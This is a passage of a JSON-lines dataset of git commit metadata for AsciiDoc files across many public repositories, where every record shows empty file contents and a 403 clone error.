Gastaldi <gegastaldi@gmail.com>\n\nUpdate adr\/0001-community-discussions.adoc\n\nCo-authored-by: George Gastaldi <gegastaldi@gmail.com>\n\nactually update right file\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"adr\/0001-community-discussions.adoc","new_file":"adr\/0001-community-discussions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ea4c285b6c1577a9bfaa93e35bebf1ae332a7fb","subject":"Update aggregation.asciidoc (#24042)","message":"Update aggregation.asciidoc (#24042)\n\nThere are four kinds of aggregations now, not 
three.","repos":"LeoYao\/elasticsearch,vroyer\/elassandra,jimczi\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elasticassandra,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,alexshadow007\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,sneivandt\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,winstonewert\/el
asticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,nazarewk\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,winstonewert\/elasticsearch","old_file":"docs\/reference\/aggregations.asciidoc","new_file":"docs\/reference\/aggregations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"145ba6184f3868c6057c58cc093d674dd95aec5c","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10dae6eb2d563970b418791ae8b1f704ef9ddeb5","subject":"Commit ex","message":"Commit ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Git\/Commit.adoc","new_file":"Git\/Commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c68fb317271780e3aa97feba75a060e21556c772","subject":"Create fr\/besoin_du_langage.adoc","message":"Create fr\/besoin_du_langage.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"fr\/besoin_du_langage.adoc","new_file":"fr\/besoin_du_langage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 
403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"fe0c5cd3dcaff7502b64fb6da4e7e72302d77e2b","subject":"[DOCS] Update doc build info in README","message":"[DOCS] Update doc build info in README\n\nOriginal commit: elastic\/x-pack-elasticsearch@c93986436cd82a1480803698b8b3fe80e72d51e2\n","repos":"nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3012e054443504e0143735c0d3fc157827928472","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"wlzjdm\/wolf,wlzjdm\/wolf,wlzjdm\/wolf","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wlzjdm\/wolf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b997d5c38b29be6826c79dbe996b67b79e7cbe6a","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3833364928cb7d1c11a06baa2c2ced17f5bdf6f","subject":"Update 2016-11-02-Episode-77-Bust-your-Bone.adoc","message":"Update 2016-11-02-Episode-77-Bust-your-Bone.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7ecd4d593c85e2c143066dad5a5cb4e45a8cbe5","subject":"Update 2016-02-11-Descomplicando-gulp.adoc","message":"Update 2016-02-11-Descomplicando-gulp.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c276c02f88087442c4698c9cb00466f24ab4328a","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e05c0f1ad0fc0f1409e5c89d513d9430b2cca1","subject":"Update 2016-02-06-Learning-resources.adoc","message":"Update 2016-02-06-Learning-resources.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2016-02-06-Learning-resources.adoc","new_file":"_posts\/2016-02-06-Learning-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"504d4dad3c3bb7cb5da561eb7e556e8fdddb3371","subject":"Update 2016-6-27-file-getput-content.adoc","message":"Update 2016-6-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-file-getput-content.adoc","new_file":"_posts\/2016-6-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79c67a2b5f10ad4ab105cc273d86945a8019d86e","subject":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","message":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfd222a6271cf36b285c08547ce4e732df4e5b77","subject":"Add shop module doc.","message":"Add shop module 
doc.\n","repos":"ImagicTheCat\/vRP,ImagicTheCat\/vRP","old_file":"doc\/dev\/modules\/shop.adoc","new_file":"doc\/dev\/modules\/shop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImagicTheCat\/vRP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03abb4b39fc573aabe4d2532edf5caf48b0d9423","subject":"Renamed '_posts\/2017-10-11-test.adoc' to '_posts\/2017-10-11.adoc'","message":"Renamed '_posts\/2017-10-11-test.adoc' to '_posts\/2017-10-11.adoc'","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-11.adoc","new_file":"_posts\/2017-10-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"839515171129c4cb8ec940c60202f22fdc3128ee","subject":"New README for analysis scripts","message":"New README for analysis scripts\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/cp-leaveout\/scripts\/README.adoc","new_file":"workflows\/cp-leaveout\/scripts\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d50425517f049caca4183ab86e0572f2469b6c6","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d00b47d50b09537f77e0828f41184330ed0a0b00","subject":"Initial version of Release Guide","message":"Initial version of Release Guide\n","repos":"ssinica\/backup,ssinica\/backup,ssinica\/backup","old_file":"docs\/releasing-guide.adoc","new_file":"docs\/releasing-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ssinica\/backup.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fe2e9877c29f7b92a3a2745138432471146a5dd","subject":"docs: Add breakpad documentation to user guide","message":"docs: Add breakpad documentation to user guide\n\nChange-Id: I05275aab0196dbf8fc37da320a0bf34662606a14\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6504\nTested-by: Kudu Jenkins\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Todd Lipcon 
<2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ca61d9c372d69a9728c70c24d4694570b99b3b7","subject":"Improve notes a bit.","message":"Improve notes a bit.\n","repos":"lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/09\/23\/hawkular-1.0.0.Alpha5-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/09\/23\/hawkular-1.0.0.Alpha5-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4be5ffd5ff3d598ec5a847edd9689d68a2e18d35","subject":"Update 2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","message":"Update 2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","new_file":"_posts\/2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f66d0c657846fcb4e0d0c2d4b69b413d33622524","subject":"Init Project","message":"Init Project\n\nSigned-off-by: Mike Schilling 
<49f7fbe9e108b60288e59e5258af85ba6e5f3584@gmail.com>\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28acae92eda7264f097aceb19bfa6e19cba80c23","subject":"Add Release Notes","message":"Add Release Notes\n","repos":"EMBL-EBI-SUBS\/subs-api,EMBL-EBI-SUBS\/subs-api","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fdeb90f8d8a45b1e8088c9a1d921efd7aaf8f0a","subject":"Style stuff moved out into a separate file","message":"Style stuff moved out into a separate file\n","repos":"oboehm\/jfachwert,oboehm\/jfachwert,oboehm\/jfachwert","old_file":"src\/main\/asciidoc\/de\/includes\/style.adoc","new_file":"src\/main\/asciidoc\/de\/includes\/style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oboehm\/jfachwert.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db0e7341808e7d96a9ab8d2f9a02226ff31aafd0","subject":"Update 2015-06-09-Cousteaus-Journey.adoc","message":"Update 2015-06-09-Cousteaus-Journey.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ef034304bdf17c468a840abc6e392e34c4267ce","subject":"Renamed '_posts\/2019-02-10-RTFM-Part-1.adoc' to '_posts\/2019-02-10-RTFM-Episode-0x01.adoc'","message":"Renamed '_posts\/2019-02-10-RTFM-Part-1.adoc' to '_posts\/2019-02-10-RTFM-Episode-0x01.adoc'","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9850cd471156b55feafc193a0f104e934ccecfc","subject":"add note about url encoding and more detail about failure when writing data","message":"add note about url encoding and more detail about failure when writing data\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4f8b1e1e9b456e3c28d059d6a4f67b97f3fe51f","subject":"Delete the file at 
'_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc'","message":"Delete the file at '_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3256d003e78b0c4264abed94038528aea4d89f9d","subject":"Strategic Oscillation: docs","message":"Strategic Oscillation: docs\n","repos":"oskopek\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8db66eb0e86db73e942c60f439caa17703ec62ef","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf89f3b499dc4724deefd68cff328370e23ad73d","subject":"Update DS_Store-TEST.adoc","message":"Update DS_Store-TEST.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-TEST.adoc","new_file":"_posts\/DS_Store-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a061d49f17540b0d512255a46735372795d71df7","subject":"Added description of TaskCache Hash value (#10)","message":"Added description of TaskCache Hash value (#10)\n\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Task Scheduler Keys.asciidoc","new_file":"documentation\/Task Scheduler Keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2737f75be16dddea132c63dbbd04ebb0b3c4d89d","subject":"interesting system","message":"interesting 